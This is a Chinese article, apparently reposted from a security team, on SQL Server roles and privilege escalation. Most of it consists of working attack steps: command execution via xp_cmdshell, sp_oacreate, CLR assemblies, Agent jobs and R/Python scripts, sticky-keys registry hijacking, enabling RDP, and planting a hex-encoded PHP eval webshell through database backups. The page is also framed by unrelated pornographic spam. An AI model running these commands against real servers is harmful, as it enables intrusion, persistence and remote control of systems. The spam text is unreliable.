色哟哟视频在线观看-色哟哟视频在线-色哟哟欧美15最新在线-色哟哟免费在线观看-国产l精品国产亚洲区在线观看-国产l精品国产亚洲区久久

0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內(nèi)不再提示

sqlserver的角色及權(quán)限總結(jié)

jf_vLt34KHi ? 來源:Tide安全團隊 ? 2023-01-13 14:30 ? 次閱讀

1.sqlserver的角色及權(quán)限

sqlserver的角色分為兩種:服務器角色和數(shù)據(jù)庫角色

服務器角色:服務器角色的擁有者只有登入名,服務器角色是固定的,用戶無法創(chuàng)建服務器角色。

c990c5a6-7b92-11ed-8abf-dac502259ad0.png

數(shù)據(jù)庫角色:數(shù)據(jù)庫角色的擁有者可以是用戶也可以是數(shù)據(jù)庫角色本身,管理員可以創(chuàng)建數(shù)據(jù)庫角色。

c9a72ab2-7b92-11ed-8abf-dac502259ad0.png

在sqlserver中有三種特殊的用戶:

(1)系統(tǒng)管理員(dba權(quán)限),對應服務器角色sysadmin,可以執(zhí)行sqlserver的任何動作,包括數(shù)據(jù)庫操作,文件管理,命令執(zhí)行,注冊表讀取等,為sqlserver最高權(quán)限。

(2)數(shù)據(jù)庫所有者(dbo權(quán)限),對應數(shù)據(jù)庫角色db_owner, 可以執(zhí)行數(shù)據(jù)庫中技術所有動作,包括文件管理,數(shù)據(jù)庫操作等。

(3)public角色是一種特殊的固定角色,數(shù)據(jù)庫的每個合法用戶都屬于該角色。它為數(shù)據(jù)庫中的用戶提供了所有默認權(quán)限。

判斷當前用戶角色(權(quán)限):

(1)判斷是否是sysadmin(dba權(quán)限),執(zhí)行select is_srvrolemember('sysadmin')

c9d8dfc6-7b92-11ed-8abf-dac502259ad0.png

(2)判斷是否是db_owner(dbo權(quán)限),執(zhí)行select is_member('db_owner')

c9f0320c-7b92-11ed-8abf-dac502259ad0.png

(3)判斷是否是public(普通權(quán)限),執(zhí)行select is_srvrolemember('public')/select is_member('public')

ca091e0c-7b92-11ed-8abf-dac502259ad0.pngca1dbef2-7b92-11ed-8abf-dac502259ad0.png

2.最新版sqlserver提權(quán)測試(sqlserver2019)

文章測試均在sqlserver2019+win server2019中操作。經(jīng)過測試sqlserver 2019默認安裝,使用dba權(quán)限執(zhí)行whoami不是system權(quán)限,這是因為默認安裝的sqlserver服務不是用系統(tǒng)賬戶啟動的。

ca2ee894-7b92-11ed-8abf-dac502259ad0.pngca5c7994-7b92-11ed-8abf-dac502259ad0.pngcaa97866-7b92-11ed-8abf-dac502259ad0.png

如果安裝時或在服務中更改為本地系統(tǒng)賬戶,執(zhí)行命令為system權(quán)限,可以創(chuàng)建用戶提權(quán)。

cad16786-7b92-11ed-8abf-dac502259ad0.png

3.xp_cmdshell(dba權(quán)限)

xp_cmdshell在低版本中默認開啟,由于存在安全隱患,在sqlserver2005以后,xp_cmdshell默認關閉。利用xp_cmdshell執(zhí)行系統(tǒng)命令

--判斷xp_cmdshell是否存在,返回1證明存在xp_cmdshell
selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='xp_cmdshell'
cb74009a-7b92-11ed-8abf-dac502259ad0.png
--開啟xp_cmdshell
EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',1;RECONFIGURE;
--關閉xp_cmdshell
EXECsp_configure'showadvancedoptions',1;RECONFIGURE;EXECsp_configure'xp_cmdshell',0;RECONFIGURE;
cb89dbd6-7b92-11ed-8abf-dac502259ad0.pngcbaf24ea-7b92-11ed-8abf-dac502259ad0.png
--執(zhí)行系統(tǒng)命令,sqlserver2019被降權(quán)為mssql權(quán)限
execmaster..xp_cmdshell'xxx'
cbcef3d8-7b92-11ed-8abf-dac502259ad0.png

4.sp_oacreate+sp_oamethod(dba權(quán)限)

在xp_cmdshell被刪除或不能利用是可以考慮利用sp_oacreate,利用前提需要sqlserver sysadmin賬戶服務器權(quán)限為system(sqlserver2019默認被降權(quán)為mssql)。

sp_oacreate 是一個存儲過程,可以刪除、復制、移動文件。

還能配合 sp_oamethod 來寫文件執(zhí)行系統(tǒng)命令。

--判斷sp_oacreate是否存在,返回1證明存在sp_oacreate
selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='SP_OACREATE'
cbfc7f4c-7b92-11ed-8abf-dac502259ad0.png
--開啟
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'oleautomationprocedures',1;reconfigure;
--關閉
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'oleautomationprocedures',0;reconfigure;
cc15998c-7b92-11ed-8abf-dac502259ad0.pngcc35713a-7b92-11ed-8abf-dac502259ad0.png
--執(zhí)行系統(tǒng)命令
declare@shellint
execsp_oacreate'wscript.shell',@shelloutput
execsp_oamethod@shell,'run',null,'C:\Windows\System32\cmd.exe/cwhoami'
cc560792-7b92-11ed-8abf-dac502259ad0.png

直接執(zhí)行命令成功后無回顯。

--回顯執(zhí)行系統(tǒng)命令結(jié)果
declare@shellint,@execint,@textint,@strvarchar(8000)
execsp_oacreate'wscript.shell',@shelloutput
execsp_oamethod@shell,'exec',@execoutput,'C:\Windows\System32\cmd.exe/cwhoami'
execsp_oamethod@exec,'StdOut',@textout
execsp_oamethod@text,'readall',@strout
select@str;
cc710a06-7b92-11ed-8abf-dac502259ad0.png

5.沙盒提權(quán)(dba權(quán)限)

沙盒模式是數(shù)據(jù)庫的一種安全功能。在沙盒模式下,只對控件和字段屬性中的安全且不含惡意代碼的表達式求值。

如果表達式不使用可能以某種方式損壞數(shù)據(jù)的函數(shù)或?qū)傩裕瑒t可認為它是安全的。利用前提需要sqlserver sysadmin賬戶服務器權(quán)限為system(sqlserver2019默認被降權(quán)為mssql),服務器擁有 jet.oledb.4.0 驅(qū)動。

局限:

(1)Microsoft.jet.oledb.4.0一般在32位操作系統(tǒng)上才可以

(2)Windows 2008以上 默認無 Access 數(shù)據(jù)庫文件, 需要自己上傳 sqlserver2015默認禁用Ad Hoc Distributed Queries,需要開啟。

--開啟AdHocDistributedQueries
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'AdHocDistributedQueries',1;reconfigure;
--關閉AdHocDistributedQueries
execsp_configure'showadvancedoptions',1;reconfigure;
execsp_configure'AdHocDistributedQueries',0;reconfigure;
cc9ae178-7b92-11ed-8abf-dac502259ad0.pngccc6079a-7b92-11ed-8abf-dac502259ad0.png
--關閉沙盒模式
execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',0;
--恢復默認沙盒模式
execmaster..xp_regwrite'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',2;
ccefdf2a-7b92-11ed-8abf-dac502259ad0.png
沙盒模式SandBoxMode參數(shù)含義(默認是2)
0:在任何所有者中禁止啟用安全模式
1:為僅在允許范圍內(nèi)
2:必須在access模式下
3:完全開啟
--查看沙盒模式
execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode'
cd0f4d92-7b92-11ed-8abf-dac502259ad0.png
--執(zhí)行系統(tǒng)命令
select*fromopenrowset('microsoft.jet.oledb.4.0',';database=c:windowssystem32iasias.mdb','selectshell("cmd.exe/cwhoami")')

6.CLR(dba權(quán)限)

Microsoft SQL Server 2005之后,實現(xiàn)了對 Microsoft .NET Framework 的公共語言運行時(CLR)的集成。

CLR 集成使得現(xiàn)在可以使用 .NET Framework 語言編寫代碼,從而能夠在 SQL Server 上運行,現(xiàn)在就可以通過 C# 來編寫 SQL Server 自定義函數(shù)、存儲過程、觸發(fā)器等。

--開啟CLR
execsp_configure'showadvancedoptions',1;RECONFIGURE;
execsp_configure'clrenabled',1;RECONFIGURE;
--關閉CLR
execsp_configure'showadvancedoptions',1;RECONFIGURE;
execsp_configure'clrenabled',0;RECONFIGURE;
cd3118d2-7b92-11ed-8abf-dac502259ad0.pngcd5363d8-7b92-11ed-8abf-dac502259ad0.png
--當導入了不安全的程序集之后,需將數(shù)據(jù)庫標記為可信任的
ALTERDATABASEmasterSETTRUSTWORTHYON;
cddf1da6-7b92-11ed-8abf-dac502259ad0.png

做完上述準備之后需要編寫一個CLR,首先在本地visual studio中創(chuàng)建一個 SQL Server數(shù)據(jù)庫項目

cdff3cd0-7b92-11ed-8abf-dac502259ad0.png

然后,在項目中添加一個存儲過程

ce26da42-7b92-11ed-8abf-dac502259ad0.pngce4abb4c-7b92-11ed-8abf-dac502259ad0.png

寫入以下代碼,右鍵生成,會在vs的工作目錄項目名稱Database1inDebug下生成四個文件

usingSystem;
usingSystem.Diagnostics;
usingSystem.Text;
usingMicrosoft.SqlServer.Server;
publicpartialclassStoredProcedures
{
[Microsoft.SqlServer.Server.SqlProcedure]
publicstaticvoidCmdExec(Stringcmd)
{
//Putyourcodehere
SqlContext.Pipe.Send(Command("cmd.exe","/c"+cmd));
}

publicstaticstringCommand(stringfilename,stringarguments)
{
varprocess=newProcess();
process.StartInfo.FileName=filename;
if(!string.IsNullOrEmpty(arguments))
{
process.StartInfo.Arguments=arguments;
}
process.StartInfo.CreateNoWindow=true;
process.StartInfo.WindowStyle=ProcessWindowStyle.Hidden;
process.StartInfo.UseShellExecute=false;
process.StartInfo.RedirectStandardError=true;
process.StartInfo.RedirectStandardOutput=true;
varstdOutput=newStringBuilder();
process.OutputDataReceived+=(sender,args)=>stdOutput.AppendLine(args.Data);
stringstdError=null;
try
{
process.Start();
process.BeginOutputReadLine();
stdError=process.StandardError.ReadToEnd();
process.WaitForExit();
}
catch(Exceptione)
{
SqlContext.Pipe.Send(e.Message);
}
if(process.ExitCode==0)
{
SqlContext.Pipe.Send(stdOutput.ToString());
}
else
{
varmessage=newStringBuilder();
if(!string.IsNullOrEmpty(stdError))
{
message.AppendLine(stdError);
}
if(stdOutput.Length!=0)
{
message.AppendLine(stdOutput.ToString());
}
SqlContext.Pipe.Send(filename+arguments+"finishedwithexitcode="+process.ExitCode+":"+message);
}
returnstdOutput.ToString();
}
}
ce7159e6-7b92-11ed-8abf-dac502259ad0.png

之后需要將dll文件注冊進sqlserver,這里有三種方法注冊 (1)采用16進制的方式,無文件落地

CREATEASSEMBLYsp_cmdExec
FROM0x--這里寫.sql文件里的
WITHPERMISSION_SET=UNSAFE
ce8eff1e-7b92-11ed-8abf-dac502259ad0.pngcebee9fe-7b92-11ed-8abf-dac502259ad0.png

(2)將dll文件上傳到目標機器上進行注冊

CREATEASSEMBLYsp_cmdExec
FROM'C:UsersAdministratorDesktopDatabase1.dll'--這里寫上傳dll文件的路徑
WITHPERMISSION_SET=UNSAFE
ced37bbc-7b92-11ed-8abf-dac502259ad0.png

(3)通過 SSMS注冊dll

cef52ef6-7b92-11ed-8abf-dac502259ad0.png

注冊完成后,創(chuàng)建存儲過程

CREATEPROCEDUREsp_cmdExec
@Command[nvarchar](4000)
WITHEXECUTEASCALLER
AS
EXTERNALNAMEsp_cmdExec.StoredProcedures.CmdExec
cf264266-7b92-11ed-8abf-dac502259ad0.png
--執(zhí)行系統(tǒng)命令
EXECsp_cmdExec'whoami';
cf4cb5ae-7b92-11ed-8abf-dac502259ad0.png

刪除存儲過程和程序集

DROPPROCEDUREsp_cmdExec;DROPASSEMBLYsp_cmdExec;
cf65fbcc-7b92-11ed-8abf-dac502259ad0.png

7.xp_regwrite映像劫持(dba權(quán)限)

xp_regread 與 xp_regwrite兩個存儲過程腳本可以直接讀取與寫入注冊表,利用regwrite函數(shù)修改注冊表,起到劫持作用。

利用前提sqlserver系統(tǒng)權(quán)限可以修改注冊表。

--判斷xp_rewrite是否存在,返回1證明存在xp_regwrite
selectcount(*)frommaster.dbo.sysobjectswherextype='x'andname='xp_regwrite'
cf7fc232-7b92-11ed-8abf-dac502259ad0.png
--開啟
EXECsp_configure'showadvancedoptions',1;RECONFIGURE
EXECsp_configure'xp_regwrite',1;RECONFIGURE
--關閉
EXECsp_configure'showadvancedoptions',1;RECONFIGURE
EXECsp_configure'xp_regwrite',0;RECONFIGURE

修改注冊表來劫持粘滯鍵,將粘滯鍵修改為打開cmd 在sqlserver2019+winserver2019中測試,win defender和火絨均會攔截

--劫持注冊表
EXECmaster..xp_regwrite@rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:windowssystem32cmd.exe'
--查看是否劫持成功
EXECmaster..xp_regread'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOptionssethc.exe','Debugger'
cf9ce010-7b92-11ed-8abf-dac502259ad0.png

劫持成功后連按5次shift會彈出cmd(win defender會攔截彈出的cmd并刪除已經(jīng)劫持的注冊表) 還可以修改注冊表來開啟3389

execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEMCurrentControlSetControlTerminalServer','fDenyTSConnections','REG_DWORD',0;

8.SQL Server Agent Job(dba權(quán)限)

SQL Server 代理是一項 Microsoft Windows 服務,它執(zhí)行計劃的管理任務,這些任務在 SQL Server 中稱為作業(yè)。

--啟動sqlagent
execmaster.dbo.xp_servicecontrol'start','SQLSERVERAGENT'

利用任務計劃命令執(zhí)行,創(chuàng)建任務 test并執(zhí)行命令,將結(jié)果寫入1.txt

--執(zhí)行命令
usemsdb;
execsp_delete_jobnull,'test'
execsp_add_job'test'
execsp_add_jobstepnull,'test',null,'1','cmdexec','cmd/c"whoami>c:/1.txt"'
execsp_add_jobservernull,'test',@@servername
execsp_start_job'test';
cfcb41a8-7b92-11ed-8abf-dac502259ad0.png

命令執(zhí)行成功后沒有回顯,可以把1.txt寫到表中,再查詢表中內(nèi)容獲取命令回顯。

--查看命令結(jié)果
Usemodel;
bulkinsertreadfilefrom'C:1.txt'
select*fromreadfile
cff11374-7b92-11ed-8abf-dac502259ad0.png

9.R和python(dbo/dba權(quán)限)

在 SQL Server 2017 及更高版本中,R 與 Python 一起隨附在機器學習服務中。

該服務允許通過 SQL Server 中 sp_execute_external_script 執(zhí)行 Python 和 R 腳本。

利用前提sqlserver系統(tǒng)權(quán)限可以執(zhí)行外部腳本

--開啟和關閉需要dba權(quán)限
--開啟
EXECsp_configure'externalscriptsenabled',1;RECONFIGURE
--關閉
EXECsp_configure'externalscriptsenabled',0;RECONFIGURE
d02e6044-7b92-11ed-8abf-dac502259ad0.pngd049d9be-7b92-11ed-8abf-dac502259ad0.png
--dbo和dba權(quán)限均可執(zhí)行命令
--利用R執(zhí)行命令
EXECsp_execute_external_script
@language=N'R',
@script=N'OutputDataSet<-?data.frame(system("cmd.exe?/c?dir",intern=T))'
WITH?RESULT?SETS?(([cmd_out]?text));
--利用python執(zhí)行命令
exec?sp_execute_external_script
@language?=N'Python',
@script=N'import?subprocess
p?=?subprocess.Popen("cmd.exe?/c?whoami",?stdout=subprocess.PIPE)
OutputDataSet?=?pandas.DataFrame([str(p.stdout.read(),?"utf-8")])'
d0740f2c-7b92-11ed-8abf-dac502259ad0.pngd0992776-7b92-11ed-8abf-dac502259ad0.png

10.差異備份寫webshell(dbo權(quán)限)

dbo和dba都有備份數(shù)據(jù)庫權(quán)限,我們可以把數(shù)據(jù)庫備份成可執(zhí)行腳本文件放到web目錄里,獲得 webshell。利用前提,知道網(wǎng)站絕對路徑且路徑可寫

--生成備份文件
backupdatabasetesttodisk='C:phpstudy_proWWW1.bak';
--創(chuàng)建表并寫入一句話木馬
createtabletest([cmd][image]);
Insertintotest(cmd)values(0x3c3f70687020406576616c28245f524551554553545b2761275d293b3f3e);
--將數(shù)據(jù)庫進行差異備份
backupdatabasetesttodisk='C:phpstudy_proWWWshell.php'WITHDIFFERENTIAL,FORMAT;
d0bbec16-7b92-11ed-8abf-dac502259ad0.pngd0dd8a88-7b92-11ed-8abf-dac502259ad0.pngd0fdb51a-7b92-11ed-8abf-dac502259ad0.png

蟻劍直接連接生成的shell.php

d1204206-7b92-11ed-8abf-dac502259ad0.png

dbo和dba都有備份數(shù)據(jù)庫權(quán)限,我們可以把數(shù)據(jù)庫備份成可執(zhí)行腳本文件放到web目錄里,獲得 webshell。

利用前提(1)知道網(wǎng)站絕對路徑且路徑可寫(2)利用數(shù)據(jù)庫必須存在備份文件

alterdatabasetestsetRECOVERYFULL--將數(shù)據(jù)庫修改為完整模式
createtablecmd(aimage)--新建表
backuplogtesttodisk='c:phpstudy_prowww2.bak'withinit--備份表
insertintocmd(a)values(0x3c3f70687020406576616c28245f524551554553545b2761275d293b3f3e)--將一句話木馬寫入表中
backuplogtesttodisk='c:phpstudy_prowww2.php'--備份操作日志到指定腳本文件
d14c3564-7b92-11ed-8abf-dac502259ad0.png

蟻劍直接連接生成的2.php

d16d8124-7b92-11ed-8abf-dac502259ad0.png

12.sp_oacreate+sp_oamethod寫webshell(dba權(quán)限)

在sqlserver2019+win server2019中測試,win defender會報毒并刪除一句話木馬。

declare@oint,@fint,@tint,@retint
execsp_oacreate'scripting.filesystemobject',@oout
execsp_oamethod@o,'createtextfile',@fout,'C:phpstudy_prowww1.php',1
exec@ret=sp_oamethod@f,'writeline',NULL,''
d18967fe-7b92-11ed-8abf-dac502259ad0.png

13.不支持堆疊的情況下執(zhí)行系統(tǒng)命令

select1where1=1if1=1execute('execsp_configure''showadvancedoptions'',1;reconfigure;execsp_configure''xp_cmdshell'',1;reconfigure;execxp_cmdshell''whoami''');
d1a736c6-7b92-11ed-8abf-dac502259ad0.png




審核編輯:劉清

聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權(quán)轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權(quán)或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 服務器
    +關注

    關注

    12

    文章

    9123

    瀏覽量

    85328
  • SQL
    SQL
    +關注

    關注

    1

    文章

    762

    瀏覽量

    44117
  • python
    +關注

    關注

    56

    文章

    4792

    瀏覽量

    84628

原文標題:sql server提權(quán)總結(jié)

文章出處:【微信號:Tide安全團隊,微信公眾號:Tide安全團隊】歡迎添加關注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關推薦

    iMatrix平臺核心功能—權(quán)限管理介紹

    iMatrix平臺的權(quán)限管理系統(tǒng)(ACS)是一個基于角色的訪問控制(Role-BasedAccess Control)系統(tǒng)。熟悉RBAC的朋友應該知道,在RBAC中,權(quán)限角色是相關的
    發(fā)表于 07-11 11:59

    用PythonPi實現(xiàn)門禁系統(tǒng)-權(quán)限管控

    ,尤其是管理信息系統(tǒng)中,角色權(quán)限管理的核心概念,其約可等價于我們?nèi)粘9ぷ髦械穆毼?。我們可將職位視為由職?quán)和職能組成,職權(quán)是對資源的訪問或使用權(quán)限,職能是允許采取那些行動。因為行動對于信息系統(tǒng)來說其實就是
    發(fā)表于 01-15 22:32

    通過高通平臺簡單總結(jié)權(quán)限問題

    用,但是程序本身查不出問題來,那就要抓log看一下了,很多時候就是因為沒有添加權(quán)限,下面簡單的總結(jié)了一下一、 遇到權(quán)限問題,在logcat或者kernel的log中一定會打印avc denied提示缺少
    發(fā)表于 09-27 16:53

    sqlserver常見問題解析

    sqlserver常見問題及解釋
    發(fā)表于 10-12 15:13

    Linux 下 QT遠程連接sqlserver

    Linux 下 QT遠程連接sqlserver我按照網(wǎng)上的教程 沒有成功感覺是驅(qū)動安裝了 配置沒成功,請問下要配置哪些文件,數(shù)據(jù)庫是 sqlserver 2018
    發(fā)表于 12-06 15:53

    sqlserver如何批量導出數(shù)據(jù)

    sqlserver批量(部分)導出一張表中的數(shù)據(jù)
    發(fā)表于 06-11 11:58

    一個通用的權(quán)限管理模型的設計方案

    本文提出了一種集成功能權(quán)限和數(shù)據(jù)權(quán)限的通用的權(quán)限管理模型,該模型在主要對角色授權(quán)的基礎上加入了對用戶直接授權(quán)和屏蔽部分角色
    發(fā)表于 05-26 10:34 ?28次下載

    RBAC私有權(quán)限問題研究

    角色繼承關系中的私有權(quán)限問題是 RBAC 中一個尚未被很好解決的問題,通過對最新的研究成果進行分析,總結(jié)其優(yōu)點分析不足,發(fā)現(xiàn)原有模型在靈活性和可管理性方面存在一些不足
    發(fā)表于 09-02 15:15 ?7次下載

    Delphi教程之如何動態(tài)建立SQLServer ODBC

    Delphi教程之如何動態(tài)建立SQLServer ODBC,學習Delphi的必備資料。
    發(fā)表于 03-31 11:29 ?4次下載

    基于角色的多約束動態(tài)權(quán)限管理模型

    在基于角色的訪問控制模型(RBAC)基礎上,引入訪問終端、網(wǎng)絡環(huán)境和接入方式等外部因素,提出了基于角色的多約束動態(tài)權(quán)限管理模型,依據(jù)外部因素的安全程度和資源可能帶來安全風險分別對外部因素和資源進行
    發(fā)表于 11-14 11:17 ?6次下載
    基于<b class='flag-5'>角色</b>的多約束動態(tài)<b class='flag-5'>權(quán)限</b>管理模型

    Linux進程權(quán)限的分析說明

     在linux下,關于文件權(quán)限,大部分人接觸比較多,也比較熟悉了解。但是對進程權(quán)限一般知之甚少。本文總結(jié)一下linux系統(tǒng)下進程權(quán)限問題和現(xiàn)象。
    發(fā)表于 07-17 10:55 ?871次閱讀

    權(quán)限框架jcasbin的角色權(quán)限配置

    然后最近我發(fā)現(xiàn)了另一個權(quán)限框架jcasbin,雖然網(wǎng)上還沒有很多關于博客,但是我看了一會就可以使用了。
    的頭像 發(fā)表于 10-21 10:58 ?1400次閱讀

    erp用戶權(quán)限管理怎么做

    執(zhí)行一些操作,給系統(tǒng)數(shù)據(jù)及公司業(yè)務安全帶來風險。到底erp用戶權(quán)限管理該怎么做呢? erp用戶權(quán)限管理: 1 、ERP系統(tǒng)的授權(quán)機制 很多ERP系統(tǒng)采用的是目前國際上比較流行的基于角色的訪問機制(Role-Based Acces
    的頭像 發(fā)表于 12-02 14:50 ?2240次閱讀

    基于角色的松耦合式權(quán)限控制設計

    主體采用RBAC(Role-Base Access Control,基于角色的訪問控制)模型,就是用戶通過角色權(quán)限進行關聯(lián)實現(xiàn),多對多的用戶角色關系模式。
    的頭像 發(fā)表于 01-12 14:31 ?852次閱讀

    華納云:設置RBAC權(quán)限的方法

    設置 RBAC(基于角色的訪問控制) 權(quán)限通常涉及以下幾個步驟: 1. 定義角色: ? ?確定組織中不同的角色,這些角色應該反映組織結(jié)構(gòu)和工
    的頭像 發(fā)表于 11-11 16:20 ?188次閱讀
    主站蜘蛛池模板: 浪潮色诱AV久久久久久久| 久久精品一本到99热| 视频一区国产第一页| 国产精品爽爽久久久久久蜜桃网站| 日韩在线 无码 精品| 国产成人久久AV免费看澳门| 小草影院免费| 久久综合亚洲色hezyo| a级销魂美女| 亚洲 欧美 日本 国产 高清| 九九久久国产| 被老头下药玩好爽| 亚洲国产成人久久一区www妖精 | 无码爽死成人777在线观看网站| 国产CHINESE HD精品| 一本久道久久综合狠狠躁AV| 美女诱点第6季| 国产美女视频一区二区二三区 | 92电影网午夜福利| 伦理片在线线249| 出轨的妻子在线观看| 亚洲中文字幕欧美自拍一区| 男女XX00上下抽搐动态图| 俄罗斯美幼| 伊人久久综合热青草| 日本久久久久久久做爰片日本| 国产精品毛片AV久久97| 6080yy 久久 亚洲 日本| 色翁荡息又大又硬又粗又爽电影| 精品国产自在天天线2019| 成人无码精品一区二区在线观看| 亚洲精品97福利在线| 欧美日韩另类在线专区| 饥渴的40岁熟妇完整版在线| 国产 在线 亚洲 欧美 动漫| 1234成人网| 亚洲精品一区三区三区在线观看| 日韩亚洲国产中文字幕欧美| 伦理电影v男人天堂| 狠狠色丁香久久婷婷综合_中| yellow日本高清在线|